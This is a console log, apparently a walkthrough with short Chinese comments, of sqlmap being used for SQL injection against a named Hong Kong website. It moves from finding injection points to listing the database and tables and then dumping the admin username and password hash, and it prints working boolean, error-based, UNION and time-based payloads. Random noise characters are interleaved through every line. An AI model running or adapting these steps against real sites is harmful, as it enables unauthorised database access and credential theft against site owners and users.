D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 [# Q7 o% O$ S1 h- Q
ms "Mysql" --current-user /* 注解:获取当前用户名称
' E L0 p3 H, v5 Q: M) C! ~5 u sqlmap/0.9 - automatic SQL injection and database takeover tool
9 f% {0 c/ L) r+ n, @$ M7 L) X http://sqlmap.sourceforge.net starting at: 16:53:547 I8 z5 q4 @1 m g
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 Q5 I8 `2 f/ E: V& i7 `
session file
" c, O; |: ~3 r' Q[16:53:54] [INFO] resuming injection data from session file
' Q- h5 Z/ ^/ @' p- w+ q" H[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' ~* ]6 c1 }8 W5 P( k; u
[16:53:54] [INFO] testing connection to the target url; J6 n& K J8 P4 w) \
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 M) z0 f1 ~( e( n& A
sts:2 ` I8 K" ]' f9 x
---
$ ^1 G! m a' H2 a5 C1 e. pPlace: GET
6 ]) J' \% s6 F9 N: n/ @2 BParameter: id
" h7 V3 ?0 x) f) ~: c$ h Type: boolean-based blind- t- p- q, z- B ^& \
Title: AND boolean-based blind - WHERE or HAVING clause+ P6 e9 g" l- z c
Payload: id=276 AND 799=7991 N5 p$ n3 j# s% N/ S7 m; a; P" H
Type: error-based
2 t0 n) f: J8 ~# I8 H8 I Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) T7 `& r4 H7 t: U3 Q/ f4 B- T2 f2 `
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# ~8 Z2 c7 q: S2 P
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
t4 b7 c& r, B4 r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; [# \/ |7 s/ J! x6 P% u) B Type: UNION query1 v1 j z; n4 J; K5 m+ @
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 X$ T w' |, l! z( ~ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) F! z E; X- _! [% p6 Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 E" }$ _" }4 j- @
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 G2 o7 J$ \+ s! n3 I- M% h Type: AND/OR time-based blind: X! i: q: z: X$ @5 Z
Title: MySQL > 5.0.11 AND time-based blind
0 v# I; H2 l/ E0 S, o% Y# u Payload: id=276 AND SLEEP(5)
8 N5 ?% L/ Q8 P( x+ W( {* B---: }* c6 h! p! w# G3 l/ V
[16:53:55] [INFO] the back-end DBMS is MySQL1 ]0 }, J7 x' U4 I @
web server operating system: Windows
) I; J1 X+ B: ]6 P/ Y6 y3 I Dweb application technology: Apache 2.2.11, PHP 5.3.0* D0 _: d/ w* B
back-end DBMS: MySQL 5.0- d9 i% R% j) P* p. G, L
[16:53:55] [INFO] fetching current user5 p; Y; u7 i0 O5 X8 j! R% N
current user: 'root@localhost'
0 X* X- Y( V* I2 `' t" E[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 {5 u' M/ }& d4 Ntput\www.wepost.com.hk' shutting down at: 16:53:58
: `$ B; c7 a& Z3 G1 _
+ ~( M' ?0 `. V+ U( [4 [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) g; X. V6 S, |( ~ms "Mysql" --current-db /*当前数据库
) ? A5 q7 [4 Q4 j2 j4 w& p5 u sqlmap/0.9 - automatic SQL injection and database takeover tool
; C' o% h! E' h9 Q5 g http://sqlmap.sourceforge.net starting at: 16:54:165 M) A6 _! Z4 n# }3 b
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 n1 Y& r# q" n' s7 ^4 Y7 r& P
session file8 Y4 B: c2 H0 Q+ v6 B
[16:54:16] [INFO] resuming injection data from session file
! C5 s) c- D! F: w8 C3 c[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' i+ w2 x% Z$ n" ?' I9 O3 g: b[16:54:16] [INFO] testing connection to the target url
3 y5 x% Y4 }5 u+ S) xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
, O' E9 Q F9 n# Ysts:
" j/ H, I9 R2 _" i# G X---9 t) D& Y+ Q) z, a
Place: GET
: [+ _9 e% Z1 C/ Z, V$ {6 EParameter: id
7 D7 I+ `' b! V _ Type: boolean-based blind
) \7 h# V% u% L7 r7 i. b4 H Title: AND boolean-based blind - WHERE or HAVING clause
# P% H) T$ R: {1 ^1 ^% x8 B! D Payload: id=276 AND 799=799
5 `& p C8 L% l' i3 L9 b Type: error-based) _& a( y+ k0 P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- q: m3 V" F& A" P: j& i7 c Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 n5 X. s. w+ W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 m# `8 e7 Y' I5 i0 U' {# G),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ B. i: B* r$ V3 |5 a1 @
Type: UNION query
/ P- |6 N8 G" M* }# y Title: MySQL UNION query (NULL) - 1 to 10 columns$ w* h i+ I3 D1 f( C2 Q5 P9 E2 p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( [, v) A7 U- U
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) ?) {2 @* C' w5 x8 F# u+ r, r3 e6 E
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' j: \& y1 X- M ~ Type: AND/OR time-based blind' O" Z5 g/ d2 ]2 y
Title: MySQL > 5.0.11 AND time-based blind
, E9 y; W$ d' H$ f- O4 Y Payload: id=276 AND SLEEP(5)
4 F) J5 t `7 _# f---& ~% T9 c0 p, X2 t7 M
[16:54:17] [INFO] the back-end DBMS is MySQL
2 M( v H/ K: |web server operating system: Windows" v& p- P! Z$ T% I) j
web application technology: Apache 2.2.11, PHP 5.3.03 z X; U3 {4 {$ Y: J/ m$ B
back-end DBMS: MySQL 5.0, y" o8 I5 w+ ]' Q& H: t2 {5 j
[16:54:17] [INFO] fetching current database8 v# a# N6 d) i% e
current database: 'wepost'
% Z0 t0 a! N& P7 i9 a2 g[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou C' k/ w, d- o$ |9 H! L
tput\www.wepost.com.hk' shutting down at: 16:54:18) N8 S Z1 o$ D7 N" x/ B5 B
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db+ P5 O/ y4 d; s/ r
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
" Z' o( Z4 C8 R( F0 m( @ Q9 f' k0 v sqlmap/0.9 - automatic SQL injection and database takeover tool
( S: s- ?& D2 v0 n http://sqlmap.sourceforge.net starting at: 16:55:25& K- d9 U- [! x7 Z
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, E. J, `, s. J! f7 O0 }" O
session file) B V+ N% T7 j( W% s! h
[16:55:25] [INFO] resuming injection data from session file7 _: P7 N' X* d7 g
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
4 G$ E( Z3 n7 y[16:55:25] [INFO] testing connection to the target url% s# h x5 @8 E3 C7 d9 ]( Z% r
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 h+ F' r! O+ k R& X# \* A( ]( |0 ^sts:
" Y$ `: ~3 ^1 {" u4 n4 z; O---
1 F" ]5 z0 U1 `) R. m3 I4 TPlace: GET
; H1 I V7 C9 Q, y; GParameter: id
) P8 h* P. i4 o7 Z4 H: T- O- C Type: boolean-based blind, A+ }! v7 F6 i, S
Title: AND boolean-based blind - WHERE or HAVING clause
* v5 e! b3 A+ {$ a0 B0 R Payload: id=276 AND 799=7991 ~2 O j6 h# b- Z. m
Type: error-based0 Q. y- Y/ m; a( o$ {1 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
{4 Z! M9 C6 f0 P! y+ d0 e Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% L) R( g6 Q: `9 U/ s. g
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ z) }9 k/ \2 H9 d
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, s8 E a# r. _: K8 i* R+ w" V Type: UNION query8 W; E } n" p" A+ u6 X& v9 C
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 R/ x7 s6 }- ~9 i1 R( D Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 i% r+ S% {! D( b
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 T# k [/ Q9 c+ f# W% k/ X
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- y. r1 I/ H& P0 Z' i# c7 k- \/ x Type: AND/OR time-based blind
- h$ V: m/ [. L5 {- n& k+ ` Title: MySQL > 5.0.11 AND time-based blind
- g0 K. p( |( l4 R Payload: id=276 AND SLEEP(5): ?% k+ Q9 k' I% m0 |/ {7 V9 ]
---
4 s* t% h9 y! f[16:55:26] [INFO] the back-end DBMS is MySQL& W& U9 K( s2 ?: [6 m
web server operating system: Windows# l- Q3 W4 ~+ L1 E" q0 x
web application technology: Apache 2.2.11, PHP 5.3.0
% Q3 I' V1 w4 z: i' R% h3 M' Mback-end DBMS: MySQL 5.0
: @& W2 T6 f ]& [) J[16:55:26] [INFO] fetching tables for database 'wepost'" |2 S( F) L) n6 M7 C6 Y3 E5 ]4 h
[16:55:27] [INFO] the SQL query used returns 6 entries
# l+ o {3 O1 f& JDatabase: wepost
, W: m E4 p) K1 I) v. W* ~[6 tables]
" C# C; F' s. M. {/ S# T' [+-------------+
1 T) B% N8 S. e* K8 X| admin |$ Y- L4 }* ~( e3 ] H% X2 j
| article |4 e/ z. a- U( ]6 F6 K( v* R
| contributor |# \' h! G6 F5 G* `0 I
| idea |
/ d! c9 X, _ _- r' ]) `2 B| image |* q' D2 Q! W" c8 G# Q! _, k
| issue |
0 `+ y7 O" L3 b7 K8 I9 X+-------------+/ _( n. E# \* H/ ^( q5 C+ ]
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 c0 {) L+ D. a3 z
tput\www.wepost.com.hk' shutting down at: 16:55:33
0 ~4 F3 f" f J& i8 o3 J2 }( m
; \7 Z' o% J1 e, T' pD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
9 e% a$ _; [! E8 Z* Y9 R2 x5 ?2 Cms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
* L4 r- V2 n% t6 N7 V1 E' P sqlmap/0.9 - automatic SQL injection and database takeover tool5 l. Q# p# T }. Z
http://sqlmap.sourceforge.net starting at: 16:56:06: c% ^) a% f9 s* d$ v5 U7 g M
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
- w/ l, \, k% Msts:. U8 O- R8 S" M6 f& ]1 Q% M) g
---
, s+ C% i) f, A4 D8 r8 Z6 Y9 bPlace: GET
6 T9 c, o. O9 A" s" OParameter: id
. n5 V9 f! S) O' I Type: boolean-based blind4 M" N9 s& x$ Y7 G; p
Title: AND boolean-based blind - WHERE or HAVING clause
+ F/ A* y( J- N' v Payload: id=276 AND 799=799: x" z2 O; n8 A4 K+ F2 S
Type: error-based9 v* V' K- `# u& T2 \( S
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; D' v6 h! y7 r4 a. I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, B: K$ D% t, }% {( ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, m: o) b/ O! V! `+ l6 E),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 r. ^; g! y* g1 P
Type: UNION query
* W6 d0 U1 j5 f0 B Title: MySQL UNION query (NULL) - 1 to 10 columns. T; U3 m9 }) B% I( a& X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: w" e9 R0 k; K3 Q3 z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 S! J8 C& @: f, O$ N+ oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" j/ D) ~5 }7 ]3 B, j8 O3 H Type: AND/OR time-based blind
0 r. j. P6 _& O Title: MySQL > 5.0.11 AND time-based blind
6 n9 g2 [! w, |8 ~+ j2 S Payload: id=276 AND SLEEP(5)
, |0 H' _$ ?6 g; Z: J2 ^" m) B4 [---; f' Y8 Q/ z# O9 T- J. [/ k" B2 P
web server operating system: Windows% D: S1 q% h6 x! j3 \* P, V
web application technology: Apache 2.2.11, PHP 5.3.0
5 Y5 s' l3 u) A: k" Hback-end DBMS: MySQL 5.04 U4 N# q8 X, V& Q9 }
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& }; [7 u$ F0 t4 a$ ^ssion': wepost, wepost
1 ` t$ f7 g* `" l8 `9 a. zDatabase: wepost
; B9 e# u- \1 p# mTable: admin4 ` U9 S$ Z" `7 v' u4 Q0 [1 }1 o4 w
[4 columns]
0 J/ j) c |, W, W# A5 j4 l$ ]% L2 H+----------+-------------+
* G2 ^6 Q! Y8 ]+ T8 g" R| Column | Type |/ h6 S- K' p, k1 N7 N6 o; w
+----------+-------------+- ` P* w2 e* U+ ~
| id | int(11) |. \) }0 o6 P4 X* H* u
| password | varchar(32) |
3 d* d$ o5 z) J! B# @ P% v| type | varchar(10) |* p) Q. x& c1 L: c& ~
| userid | varchar(20) |
! p `; Z& ]% H0 K; M" |+----------+-------------+
) ~, |: o/ w& b4 Y7 m% y% E shutting down at: 16:56:19
3 s/ n8 c, N- o* t2 O I# n6 U4 y# \2 S" G2 z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 H9 a; p0 V7 s/ A) M7 C
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
' i; ?. A3 W' Z sqlmap/0.9 - automatic SQL injection and database takeover tool
* `( r( |6 m! ? D http://sqlmap.sourceforge.net starting at: 16:57:14/ {' Q J- N; ?8 r \
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 n. r% r" ]- p$ Y. _; b
sts:0 n+ u, t. j' j% Q! \& _
---5 S2 K2 n2 ]" c
Place: GET
0 c# k/ _% T' z. O1 N5 Y) UParameter: id7 f3 P$ M% U% }4 o& v b+ k' h* h
Type: boolean-based blind! `# h R/ J# T5 `" e2 `
Title: AND boolean-based blind - WHERE or HAVING clause. S$ \. d% l, O0 ]
Payload: id=276 AND 799=799 [4 R+ l7 D: x
Type: error-based
' J" s) {( u( }2 C. { Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- W% D2 w2 |& {* z( O% L: G0 Q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( G3 x x6 C, G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 x8 i0 F+ k5 R# f* ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ S+ K7 j- U" ]; g* T& N Type: UNION query
+ ~4 e6 \4 ^, b( h! d Title: MySQL UNION query (NULL) - 1 to 10 columns% y; K# v j" f! l) f% b
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 y/ c6 k- J, I/ J L* `) f
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. N. E* ]; T& J3 F7 rCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 O! q# k7 d' d- K0 G/ S( P Type: AND/OR time-based blind
/ g/ I4 j2 x$ _9 t Title: MySQL > 5.0.11 AND time-based blind0 h2 |( g- i B+ b& v3 q
Payload: id=276 AND SLEEP(5)' }: v- H+ C2 L5 x( y
---
h5 M4 f9 q# p# Nweb server operating system: Windows6 L8 a8 }5 g5 K' r+ ^
web application technology: Apache 2.2.11, PHP 5.3.0
0 e/ ?9 m; g `. [4 Wback-end DBMS: MySQL 5.0
* U3 L& e* d- I8 v" @recognized possible password hash values. do you want to use dictionary attack o
4 T# @9 s" w6 r8 \! t! `n retrieved table items? [Y/n/q] y- ~9 ^& W) A" q9 d+ } O
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
% O" ^8 s& a1 P* n; ?+ N! a+ _do you want to use common password suffixes? (slow!) [y/N] y q6 y7 l& B1 H. j7 V" i+ p
Database: wepost7 U; E- U( j3 |& w
Table: admin
: x6 w4 P5 Y: d* i% `1 _. C( ^[1 entry]$ M* z: Q3 M. v) m
+----------------------------------+------------+
$ Q3 h' w: J$ ?: m& Q/ v* q| password | userid |
* r: }1 x, v2 p- |- |% i$ E# I8 L+----------------------------------+------------+
) C- s Q5 `! r) d| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |9 [5 v9 H4 l; u% `( I4 G
+----------------------------------+------------+% j% d7 p2 i6 W+ N
shutting down at: 16:58:14
- i$ b ?; \- R% z- b9 x$ e$ |# m- D: G/ f1 p) A
D:\Python27\sqlmap> |